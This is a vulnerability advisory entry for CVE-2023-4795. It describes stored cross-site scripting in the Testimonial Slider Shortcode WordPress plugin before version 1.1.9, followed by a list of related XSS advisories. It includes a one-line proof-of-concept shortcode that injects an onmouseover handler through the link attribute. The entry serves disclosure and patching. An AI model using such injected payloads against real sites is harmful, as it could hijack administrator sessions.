Testimonial Slider Shortcode < 1.1.9 – Contributor+ Stored XSS | CVE 2023-4795 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin

Proof of Concept

[tss_item text=»Abelson has been an amazing firm to work with. Lorem changed the company.» name=»JOHN SAMPSON LP» link='" onmouseover="alert(/XSS/)"'/]

Affects Plugins

testimonial-slider-shortcode

Fixed in 1.1.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

b8390b4a-b43f-4bf6-a61b-dfcbc7b2e7a0

Timeline

Publicly Published

2023-09-25 (about 7 months ago)

Added

2023-09-25 (about 7 months ago)

Last Updated

2023-09-25 (about 7 months ago)

Other

Published

Title

Published

2020-04-04

Title

Online Hotel Booking System Pro <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2023-05-22

Title

Leyka < 3.30.2 - Reflected XSS

Published

2017-07-10

Title

WP Live Chat Support < 1.7.03 - XSS

Published

2023-04-19

Title

Login Page Styler < 6.2.5 - Admin+ Stored XSS

Published

2020-09-09

Title

All In One WP Security & Firewall < 4.4.4 - CSRF & XSS